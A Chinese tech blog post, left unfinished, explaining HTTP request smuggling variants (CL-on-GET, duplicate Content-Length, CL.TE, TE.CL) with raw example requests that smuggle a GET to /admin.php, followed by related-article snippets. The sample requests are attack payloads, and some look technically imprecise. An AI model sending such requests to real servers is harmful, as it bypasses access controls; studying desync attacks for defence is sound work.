HTTP协议请求走私

最新推荐文章于 2024-05-18 16:51:01 发布
最新推荐文章于 2024-05-18 16:51:01 发布
阅读量127 收藏
点赞数
文章标签: http 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a98llen/article/details/128402755
版权

http协议请求走私

0x00:
源自BlackHat议题HTTP Desync Attacks: Smashing into the Cell Next Door,懒得搬运了,嘿嘿!
0x01:
HTTP走私手法

  • Content-Length,CL值不为0
    GET请求为例,前端的代理服务器允许GET携带请求体;而后段服务器不允许GET携带请求体,后端服务器会直接忽略掉GET请求中的CL content- length字段,不对其进行处理。请求包如下:
GET / HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 499

GET /admin.php HTTP/1.1
Host: XXXXXXXX.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

在这里插入图片描述该http请求大体发生了啥?
前端服务器收到该请求包后,会读取content-length字段,认为这个请求是完整的并转发到后端服务器;
后端服务器收到这个请求后,并不会对contetn-length字段进行处理,并由于Pipeline机制,后端服务器会认为它接收到了两个http请求。

  • Content-Length
    Content-Length
    前端服务器按照第一个content-length的值对请求进行处理;
    后端服务器按照第二个content-length的值对请求进行处理。
    请求包如下:
POST / HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 517
Content-Length: 517

http协议走私
GET /admin.php HTTP/1.1
Host: XXXXXXXX.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

在这里插入图片描述该http请求大体发生了啥?
前端代理服务器读取第一个content-length的值,认为请求包是完整的并原封不动的发送到后端服务器;
后端服务器会读取第二个content-length的值,读取完后会生成响应包

  • Content-Length
    Transfer-Encoding
    前端代理服务器只处理content-length字段;
    后端服务器忽略content-length字段,来处理transfer-encoding字段
    请求包如下:
POST / HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 499
Transfer-Encoding: chunked

GET /admin.php HTTP/1.1
Host: XXXXXXXX.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

在这里插入图片描述该http请求大体发生了啥?
前端代理服务器处理content-length字段,认为请求包是完整的并转发到后端服务器;
后端服务器忽略content-length字段,并处理transfer-encoding字段做出响应。

  • Transfer-Encoding
    Content-Length
    前端服务器处理transfer-encoding字段,认为数据包是完整的并原封不动的将数据包转发到后端服务器;
    后端服务器只处理content-length字段,并做出响应。
POST / HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 506

GET /admin.php HTTP/1.1
Host: XXXXXXXX.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

11111

在这里插入图片描述该http请求大体发生了啥?
前端代理服务器处理transfer-encoding,并将数据转发到后端服务器;
后端服务器忽略transfer-encoding字段,处理content-length字段并做出响应

0x02:
媳妇催睡觉,再说吧。大概就这么回事儿。

夕阳红i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
http-request-smuggling:HTTP请求走私检测工具
05-04
HTTP请求走私检测工具HTTP请求走私是一种高度严重的漏洞,该技术是攻击者通过模糊的HTTP请求走私以绕过安全控制并获得未经授权的访问权以执行恶意活动,该漏洞是在2005年由发现的,并于2019年8月重新发现。...
HTTP请求走私初识
Armandhe的博客
07-24 1588
一如http走私深似海,无法自拔
http请求走私
qingjie0ng的博客
01-12 1937
http 1.1 (应用层) 特性: keepalive 建立一次tcp连接后,并不会把连接关闭(完成tcp三次握手) pipline 可在同一个请求的head(报头)写入两个http请求HTTP协议中的Transfer-Encoding:HTTP 协议中的 Transfer-Encoding | JerryQu 的小站 HTTP请求走私漏洞的产生:大多数 HTTP 请求走私漏洞的出现是因为 HTTP 规范提供了两种不同的方式来指定请求的结束位置:Cont
http请求走私详解
01-10 2914
HTTP请求走私是一种干扰网站正常处理从一个或多个用户收到的HTTP请求的方法,请求走私漏洞在本质上通常很关键,允许攻击者绕过安全控制,获得对敏感数据的未授权访问,并直接危害其他应用程序的用户。随便提一句:本文的环境为网站https://portswigger.net/提供的在线环境。现在的网络架构,一般后端真实响应的服务器前端还有存在一个反向代理或者负载均衡的服务器,例如常见的Nginx + tomcat的响应方式。
解密协议层的攻击——HTTP请求走私
京东科技开发者
02-18 3911
最近一直在研究一些比较有意思的攻击方法与思路,在查阅本地文档的时候(没错,本地,我经常会将一些有意思的文章但是没时间看就会被我保存pdf到本地),一篇2019年Black hat的议题——...
从一道题深入HTTP协议HTTP请求走私
Lemon's blog
02-03 1540
前言: 最近参加了一次线上赛,发现其中有一道web题蛮有意思,之前是一道国赛题的,这次是加了点WAF,但当时没有仔细学习过HTTP协议HTTP走私协议,所以也就没有绕过WAF,这次就来弥补这个遗憾 HTTP/1.1协议 定义: HTTP(超文本传输协议):一种无状态的、应用层的、以请求/应答方式运行的协议,它使用可扩展的语义和自描述消息格式,与基于网络的超文本信息系统灵活的互动 HTTP协议工作...
Smuggler-用Python 3编写的HTTP请求走私/不同步测试工具-Python开发
05-25
Smuggler-使用Python 3 ______ _ / _____编写的HTTP请求走私/取消同步测试工具)| | (((____ ____ _ _ ____ ____ | | _____ ____ \ ____ \ | \ | | | | / _ | / _ | || ___ | / ___)_____))|( | | | _ | (...
http-desync-guardian:分析HTTP请求以最大程度地减少HTTP异步攻击的风险(HTTP请求走私拆分的前身)
03-21
http_desync_guardian库旨在分析HTTP请求,以防止HTTP Desync攻击,从而平衡安全性和可用性。它将请求分为不同并提供有关如何处理每个层级的建议。 它既可以用于原始HTTP请求标头,也可以由HTTP引擎解析。消费者...
HTTP-Smuggling-Lab:使用HTTP走私实验室学习HTTP走私
05-22
HTTP-Smuggling-Lab是用于学习有关HTTP请求走私的实验室。 安装 使用docker-compose在每个目录中构建实验室。 用法 在每个目录中详细阅读README.md。 在Lab1中,我们将链接一些反向代理关系,Nginx将是最终的后端,...
h2csmuggler:通过HTTP2明文(h2c)的HTTP请求走私
03-18
通过与兼容h2c的后端服务器建立HTTP / 2明文(h2c)通信,h2cSmuggler通过不安全的边缘服务器proxy_pass配置走私HTTP流量,从而允许绕过代理规则和访问控制。 请参阅以下我的详细文章: 漏洞的技术细分 不安全的默认...
Http常见问题
qq_51240148的博客
05-14 255
.
Python爬虫——如何使用urllib的HTTP基本库
C1356498720的博客
05-14 777
robots.txt。
httphttps的区别
Mr.xing的博客
05-13 259
其实也不一定就安全,原因是用户不会再访问时候加上http:// 或 https://, 浏览器就默认会加上http://,然后通过转发的方式转成https:// 这个过程http就有可能会被劫持了。而HTTPS则通过SSL/TLS协议进行加密传输,这种加密方式可以保护数据在传输过程中的安全,防止数据被窃取或篡改。这可能导致HTTPS在某些情况下比HTTP稍慢一些,但考虑到其提供的安全性,这种资源消耗是可以接受的。2. 连接方式:HTTP的连接是明文的,而HTTPS则通过SSL/TLS协议建立加密连接。
Golang:使用net/http实现一个简易的http服务器
彭世瑜的博客
05-18 247
可以看到,我们的服务端可以正确获取到请求的参数信息和json请求体,以及请求头部信息。注意:由于请求体只能读取一次,所以form和rawData只能取到一个。1、实现一个简易的服务端。的服务,返回请求的信息。
HTTP 发展史
山重水复疑无路,柳暗花明又一村。
05-14 794
超文本传输协议(英语:HyperTextTransferProtocol,缩写:HTTP是万维网(World Wide Web)的基础协议。自蒂姆·伯纳斯-李(Tim BernersLee)博士和他的团队在 1989-1991 年间创造出它以来,HTTP 已经发生了太多的变化,在保持协议简单性的同时,不断扩展其灵活性。如今,HTTP 已经从一个只在实验室之间交换文档的早期协议进化到了可以传输图片,高分辨率视频和 3D 效果的现代复杂互联网协议。HTTP的诞生1989 年 3 月。
HTTPHTTPS 的区别 + SSL协议
Iamme
05-17 937
服务端用私钥解密后,得到了客户端传过来的随机值(对称秘钥),然后把内容通过该值进行对称加密,所谓对称加密就是,将信息和私钥通过某种算法混合在一起,这样除非知道私钥,不然无法获取内容,而正好客户端和服务端都知道这个私钥,所以只要加密算法够彪悍,私钥够复杂,数据就够安全。这种方法看起来不错,但是也存在问题,如果在发送的时候被拦截下来,密钥就会泄露给中间人,此时中间人就可以通过密钥来对之后的数据进行解密,此时也就失去了加密的意义这时,就引入了非对称加密。SSL确保安全性的同时,在客户端和服务端都要进行。
Http文件下载的相关header
常备不懈
05-16 294
用于指示浏览器应该如何处理响应体。在文件下载中,通常设置为,其中是要下载的文件名。: 指示响应体的MIME类型,例如image/jpeg或。: 响应体的长度(以字节为单位)。: 控制缓存的行为,通常可以设置为no-cache禁止缓存。Expires: 指定响应的过期时间,与一起使用来控制缓存。Pragma: 旧版本的HTTP使用的头部,现在基本不再使用,可以设置为no-cache。这些头部可以通过服务器在响应中设置,以告知浏览器如何处理文件下载。下面详细介绍这些header。
基于HTTP GET方式获取网络时间的实现
主要分享硬件、嵌入式软件部分知识
05-15 971
本篇博客介绍了如何在Linux下使用C语言和Socket API发起HTTP GET请求。这个示例程序可以扩展到其他类型的HTTP请求和不同的API服务。如果不想用苏宁的服务器,可以随便请求一个网站和不存在的网页,如果网站用的是nginx的话,访问不存在的网页也会返回一个nginx时间。
HTTP 错误 404.15 - Not Found 请求筛选模块被配置为拒绝包含的查询字符串过长的请求。...
最新发布
s01896的博客
05-18 402
如果查询字符串的长度超过大小限制,ASP.NET返回HTTP 400(错误请求)状态代码。修改完web.config里的这两个地方,问题圆满解决,本篇文章做个简单总结,供于自己今后查阅,也希望帮助到其它同学~转载于:https://www.cnblogs.com/jkyweb/p/10880174.html。出现该错误的原因为:IIS7.5对于Query String有长度限制,默认为2048。按照图中可尝试的操作提示,可以通过如下两种方法来解决问题。的最大长度,以字符数表示,默认值为2048。
如何对邮寄走私数据进行清洗
06-01
清洗邮寄走私数据的方法有很多,以下是可能的步骤: 1. 对邮件进行筛选:根据特定的筛选规则,识别出可能存在走私数据的邮件。 2. 提取数据:将邮件中的文本、附件等数据提取出来,以便于后续的分析和处理。 3. 数据分析:对提取出来的数据进行分析,识别出其中可能存在的走私数据。 4. 清洗数据:对识别出的走私数据进行清洗,例如替换敏感信息、删除不必要的数据等。 5. 导出数据:将清洗后的数据导出,以便于后续的使用或归档。 需要注意的是,邮寄走私数据的清洗需要遵守相关的法律法规,例如保护个人隐私、保护商业机密等。同时,清洗邮寄走私数据也需要保证数据的完整性和准确性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值